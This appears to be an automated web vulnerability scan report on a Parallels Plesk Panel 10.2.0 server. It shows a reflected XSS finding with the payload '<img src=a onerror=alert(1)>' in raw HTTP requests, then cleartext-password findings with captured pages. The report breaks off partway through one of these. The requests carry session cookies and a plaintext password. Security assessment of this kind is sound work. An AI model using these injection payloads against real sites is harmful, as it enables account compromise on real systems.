User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-type: application/x-www-form-urlencoded; charset=UTF-8
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PLESKSESSID=17161f28b87a6960fb097d11330c9c53; locale=en-US; psaContext=dashboard
Content-Length: 434

general%5Bvcard%5D%5BcontactName%5D=format-1&general%5Bvcard%5D%5Bemail%5D%5BemailType%5D=internal67380<img%20src%3da%20onerror%3dalert(1)>3f054407b9e&general%5Bvcard%5D%5Bemail%5D%5BinternalEmail%5D=format-1&general%5Bvcard%5D%5BroleId%5D=7&general%5Baccount%5D%5Bpassword%5D=thepassword&general%5Baccount%5D%5BpasswordConfirmation%5D=thepassword&general%5Baccount%5D%5BisActive%5D=0&general%5Baccount%5D%5BisActive%5D=1&hidden=&forgery_protection_token=3e86204e9517123c7f585d736d64aa3f&_=

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/json
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 18:24:54 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 18:24:54 GMT
Connection: close
Content-Length: 292

{"formMessages":{"general":{"vcard":{"email":{"externalEmail":{"isEmpty":"This required field is empty. You need to specify a value."},"emailType":{"notInArray":"'internal67380<img src=a onerror=alert(1)>3f054407b9e' was not found in the haystack"}}}}},"status":"success","statusMessages":[]}

2.10. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/user/edit/id/4 [general%5Bvcard%5D%5Bemail%5D%5BemailType%5D parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/user/edit/id/4

Issue detail

The value of the general%5Bvcard%5D%5Bemail%5D%5BemailType%5D request parameter is copied into the HTML document as plain text between tags. The payload e18eb<img%20src%3da%20onerror%3dalert(1)>d7bab5ddf8b was submitted in the general%5Bvcard%5D%5Bemail%5D%5BemailType%5D parameter. This input was echoed as e18eb<img src=a onerror=alert(1)>d7bab5ddf8b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

POST /smb/user/edit/id/4 HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/smb/user/edit/id/4
Origin: http://www.nosedivesailing.com:8880
X-Prototype-Version: 1.6.1_rc3
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-type: application/x-www-form-urlencoded; charset=UTF-8
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PLESKSESSID=17161f28b87a6960fb097d11330c9c53; locale=en-US; psaContext=dashboard
Content-Length: 786

general%5Bvcard%5D%5BcontactName%5D=format-1&general%5Bvcard%5D%5Bemail%5D%5BemailType%5D=internale18eb<img%20src%3da%20onerror%3dalert(1)>d7bab5ddf8b&general%5Bvcard%5D%5Bemail%5D%5BinternalEmail%5D=fdf080d9224fd0d18957a62c&general%5Bvcard%5D%5BroleId%5D=7&general%5Baccount%5D%5Bpassword%5D=&general%5Baccount%5D%5BpasswordConfirmation%5D=&general%5Baccount%5D%5BisActive%5D=0&general%5Baccount%5D%5BisActive%5D=1&contacts%5BcontactsSection%5D%5BcompanyName%5D=1&contacts%5BcontactsSection%5D%5Bphone%5D=1&contacts%5BcontactsSection%5D%5Bfax%5D=1&contacts%5BcontactsSection%5D%5Baddress%5D=1&contacts%5BcontactsSection%5D%5Bcity%5D=1&contacts%5BcontactsSection%5D%5Bstate%5D=1&contacts%5BcontactsSection%5D%5Bzip%5D=10010&contacts%5BcontactsSection%5D%5Bcountry%5D=US&hidden=&forgery_protection_token=3e86204e9517123c7f585d736d64aa3f&_=

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/json
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 18:30:10 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 18:30:09 GMT
Connection: close
Content-Length: 467

{"formMessages":{"general":{"vcard":{"email":{"externalEmail":{"isEmpty":"This required field is empty. You need to specify a value."},"emailType":{"notInArray":"'internale18eb<img src=a onerror=alert(1)>d7bab5ddf8b' was not found in the haystack"}}}},"contacts":{"contactsSection":{"city":{"stringLengthTooShort":"The specified city name is too short."},"state":{"stateInvalid":"Incorrect state or province was specified."}}}},"status":"success","statusMessages":[]}

3. Cleartext submission of password  previous  next
There are 14 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


3.1. http://vulnerable.plesk.control.panel.20110407.20:8880/login_up.php3  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /login_up.php3

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /login_up.php3 HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: locale=en-US; PLESKSESSID=dba661f53b2a81d0d08fcba319a6f6fa

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 18:21:37 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Plesk: PSA-Key/PLSK015474560000
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 18:21:37 GMT
Connection: close
Content-Length: 5521

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />
<title>Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>

<link href="/skins/default/css/common/base.css?plesk_version=psa-10.2.0-20110407.20" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?plesk_version=psa-10.2.0-20110407.20" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?plesk_version=psa-10.2.0-20110407.20" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?plesk_version=psa-10.2.0-20110407.20" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?plesk_version=psa-10.2.0-20110407.20" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?plesk_version=psa-10.2.0-20110407.20" media="screen" rel="stylesheet" type="text/css" /><![endif]-->

<script type="text/javascript" src="/javascript/prototype.js?plesk_version=psa-10.2.0-20110407.20"></script>
<script type="text/javascript" src="/javascript/jsw.js?plesk_version=psa-10.2.0-20110407.20"></script>

</head>

<body>

<div id="login-page">
<div id="wrapper">
<div id="top">
<div id="header-wrapper">
<div id="header">

<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif" alt="Parallels Plesk Panel" title="Parallels Plesk Panel" />
</h1>



</div>
</div>
</div>
<div id="content-wrapper">
<div id="content">
<div id="content-body" class="clearfix">
<div id="main">
<form id="form-login" enctype="application/x-www-form-urlencoded" action="/login_up.php3" method="post" autocomplete="off">



<div id='loginSection' class='form-box' >
<div id='loginSection-content-area'>



<div id='loginSection-username-form-row' class='form-row' >
<div class='field-name'><label for='loginSection-username'>Username&nbsp;</label></div>
<div class='field-value'>
<input type="text" name="login_name" id="loginSection-username" value="" class="input-text" />
</div>
</div>

<div id='loginSection-password-form-row' class='form-row' >
<div class='field-name'><label for='loginSection-password'>Password&nbsp;</label></div>
<div class='field-value'>
<input type="password" name="passwd" id="loginSection-password" value="" class="input-text" />
</div>
</div>

<div class='form-row'>
<div class='field-name'><label for='fid-locale'>Interface language&nbsp;</label></div>
<div class='field-value'><select name="locale_id" id="fid-locale_id" >    <option value='default' SELECTED>Default</option>
   <option value='en-US'>ENGLISH (United States)</option>
</select>
</div>
</div>
</div>
</div>

<div class="btns-box">
<div class="box-area">
<div class="form-row">

<div class="field-name">
<a href="/get_password.php">Forgot your password?</a>
</div>
<div class="field-value">
<span id='btn-send' class='btn'>
<button type="submit" value="" name="send">Log in</button>
</span>

<script type='text/javascript'>
Jsw.onReady(function() {
$('form-login').observe('submit', function(event) {
if ($('loginSection-username').value == '' || $('loginSection-password').value == '') {
alert("Enter your username and password.");
$('loginSection-username').focus();
$('loginSection-username').select();
Event.stop(event);
return false;
}
});

$('loginSection-username').focus();
$('loginSection-username').select();
});
</script>

<!-- ability to submit form via Enter -->
<input type="image" src="/skins/default/img/blank.gif" style="border: 0; height: 0; width: 0; position: absolute; left: -9999px;"/>
</div>
</div>
</div>
</div>

</form>
</div>
</div>
</div>
</div>
</div>
</div>
<div id="footer-wrapper" class="login-footer">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; 1999-2011, Parallels. All rights reserved.</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

3.2. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/backup/ftp-repository/properties/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /plesk/client@2/domain@1/backup/ftp-repository/properties/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /plesk/client@2/domain@1/backup/ftp-repository/properties/ HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/plesk/client@2/domain@1/backup/local-repository/
Cookie: PLESKSESSID=544bdaf6dd2753ce86a143b36e3245b8; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 19:39:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 19:39:00 GMT
Connection: close
Content-Length: 15143

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="48333f77aef379c04c82252b59636182" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/general.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/layout.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/custom.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/desktop.css?2">
<!--[if IE]><link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/ie.css?2"><![endif]-->







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<link href="/skins/default/css/customer/plesk.css?1269638970" media="screen" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/javascript/tooltip.js?1302230642"></script>
<script type="text/javascript" src="/javascript/widget.js?1302230642"></script>
<script type="text/javascript" src="/javascript/chk.js.php?1302230642"></script>
<script type="text/javascript" src="/javascript/common.js?1302230642"></script>
<script type="text/javascript" src="/admin/scripts/admin-panel.js?"></script>
<title>Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/redirect/action-name/pleskin" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fredirect%2Fpleskin%2Froot%2F%252Fplesk%252Fclient%2540%252Fdomain%25401%252Fbackup%252F%2Froot%2F%252Fplesk%252Fclient%2540%252Fdomain%25401%252Fdbbackup%252F%2F%3Fdst%3D%252Fplesk%252Fclient%25402%252Fdomain%25401%252Fbackup%252Flocal-repository%252F%26src%3D%252Fsmb%252Fweb%252Fview%26srcController%3DWebController' + '&activeModule=' + 'webSitesAndDomains' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"active","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb#">
<span>Up Level</span>
</a>
</div>
<h2><span>Personal FTP Repository Settings</span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
var opt_no_frames = true;
Jsw.baseUrl = '/smb';

SetHelpModule = function(module)
{
PleskHelpModule = module;
}
var PleskHelpModule = null;

Jsw.onReady(function() {

$$('.top-help').each(function(topHelp) {
topHelp.select('a').each(function(help) {
help.href = help.href + '/plesk-context/client.domain.backup.ftp-repository.properties/';
if (PleskHelpModule) {
help.href = help.href + '/plesk-module/' + PleskHelpModule + '/';
}
});
});

$$('.sb-uplevel').each(function(link) {
link.href = '/plesk/client@2/domain@1/backup/ftp-repository/';
});

if ('') {
$('content').down('.heading').addClassName('');
}
});

var opt_integrated_mode = false;
function passiveModeChanged()
{
   if ( $('fid-ftp_passive_mode_checkbox').checked ) {
       $('ftp_passive_mode').value = "true";
   } else {
       $('ftp_passive_mode').value = "false";
   }
}

function initScreen()
{
   $('fid-ftp_passive_mode_checkbox').observe('click', passiveModeChanged);
   passiveModeChanged();
}

if (Prototype.Browser.IE) {
   Event.observe(window, "load", initScreen);
} else {
   Event.observe(document, "dom:loaded", initScreen);
}

function update_oC(f)
{
   if (f.ftp_password.value != f.ftp_confirm_password.value) {
       alert('Passwords do not match!');
       return false;
   }
   lsubmit(f);
   return true;
}
</script>

<script type="text/javascript">
Event.observe(window, 'load', function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [{"componentType":"Jsw.Pathbar.Item","title":"Backup Manager: Personal FTP Repository","href":"\/plesk\/client@2\/domain@1\/backup\/ftp-repository\/"}]
});
});
</script>

<div class="screenBody" id="">
<div id="warnings"></div>


<form action="/plesk/client@2/domain@1/backup/ftp-repository/properties/" method="post" enctype="multipart/form-data" >

   <div class="formArea">
       <fieldset><legend>Settings</legend>

<table class="formFields" cellspacing="0" width="100%">
   <tr >
       <td class="name"><label for="fid-ftp_server">FTP server hostname or IP&nbsp;<span class="required">*</span></label></td>
       <td><input type="text" name="ftp_server" id="fid-ftp_server" value="" size="35" maxlength="255"></td>
   </tr>
   <tr >
       <td class="name"><label for="fid-ftp_basedir">Directory for backup files storage&nbsp;</label></td>
       <td><input type="text" name="ftp_basedir" id="fid-ftp_basedir" value="" size="35" maxlength="255"><div class="hint">For example, /myfolder/mybackups/</div></td>
   </tr>
   <tr >
       <td class="name"><label for="fid-ftp_login">FTP username&nbsp;<span class="required">*</span></label></td>
       <td><input type="text" name="ftp_login" id="fid-ftp_login" value="" size="35" maxlength="255"></td>
   </tr>
   
   <tr>
       <td class="name">Old FTP password</td>
       <td>None</td>
   </tr>
   <tr >
       <td class="name"><label for="fid-ftp_password">FTP password</label>&nbsp;<span class="required">*</span></td>
       <td><INPUT maxlength="255" name="ftp_password" id="fid-ftp_password" type="password" value="" size="25"></td>
   </tr>
   <tr >
       <td class="name"><label for="fid-ftp_confirm_password">Confirm FTP password</label>&nbsp;<span class="required">*</span></td>
       <td><INPUT maxlength="255" name="ftp_confirm_password" id="fid-ftp_confirm_password" type="password" value="" size="25"></td>
   </tr>
   <tr>
       <td class="name"><label for="fid-ftp_passive_mode_checkbox">Use passive mode</label></td>
       <td>
           <input type="checkbox" class="checkbox" name="ftp_passive_mode_checkbox" id="fid-ftp_passive_mode_checkbox" value="true" />
           <input type="hidden" id="ftp_passive_mode" name="ftp_passive_mode" value="" />
       </td>
   </tr>
</table>

</fieldset>
   </div>

   <div class="formArea">
       <table width="100%" class="buttons" cellspacing="0" cellpadding="0"><tr>
           <td class="main" width="0"></td>
           <td class="footnote" id="footnote"><span class="required">*</span> Required fields</td>
           <td class="misc" width="0"><nobr><DIV class="commonButton" id="bid-ok" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Apply all changes.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);return update_oC(document.forms[0]);return false;" style=""><BUTTON name="bname_ok" id="buttonid-ok" type="submit" onClick="Event.stop(event);return update_oC(document.forms[0]);return false;">OK</BUTTON><SPAN id="spanid-ok">OK</SPAN><INPUT type="image" style="border: 0pt none ; height: 0pt; width: 0pt; position: absolute; left: -9999px;" src="/skins/default/plesk/images/1x1.gif"></DIV><DIV class="commonButton" id="bid-cancel" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Discard any changes and return to the previous page.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/backup/ftp-repository/&#039;); return false;" style=""><BUTTON name="bname_cancel" id="buttonid-cancel" type="button" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/backup/ftp-repository/&#039;); return false;">Cancel</BUTTON><SPAN id="spanid-cancel">Cancel</SPAN></DIV></nobr></td>
       </tr></table>

<input type="hidden" name="forgery_protection_token" value="48333f77aef379c04c82252b59636182">
       <input type="hidden" name="cmd" value="update">
       <input type="hidden" name="lock" value="false">
       <input type="hidden" name="previous_page" value="">
       <input type="hidden" name="wizaction">

   </div>

</form>

</div>
</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

3.3. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/odbc/dsn@1/properties/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /plesk/client@2/domain@1/odbc/dsn@1/properties/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /plesk/client@2/domain@1/odbc/dsn@1/properties/ HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/plesk/client@2/domain@1/odbc/dsn@new/properties/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dsnlist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; domainaliaseslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; domaintrafficlist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjthOjE6e3M6NDoibmFtZSI7czowOiIiO31zOjQ6InBhZ2UiO2k6MDtzOjg6InBhZ2VTaXplIjtpOjI1O30%3D; certificateslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; PLESKSESSID=66f4f3aa52eb21d7134fc0175f742f5a; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 20:09:15 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 20:09:15 GMT
Connection: close
Content-Length: 17771

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="dc1721730e046f7e1de14c19e4a424be" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/general.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/layout.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/custom.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/desktop.css?2">
<!--[if IE]><link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/ie.css?2"><![endif]-->







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<link href="/skins/default/css/customer/plesk.css?1269638970" media="screen" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/javascript/tooltip.js?1302230642"></script>
<script type="text/javascript" src="/javascript/widget.js?1302230642"></script>
<script type="text/javascript" src="/javascript/chk.js.php?1302230642"></script>
<script type="text/javascript" src="/javascript/common.js?1302230642"></script>
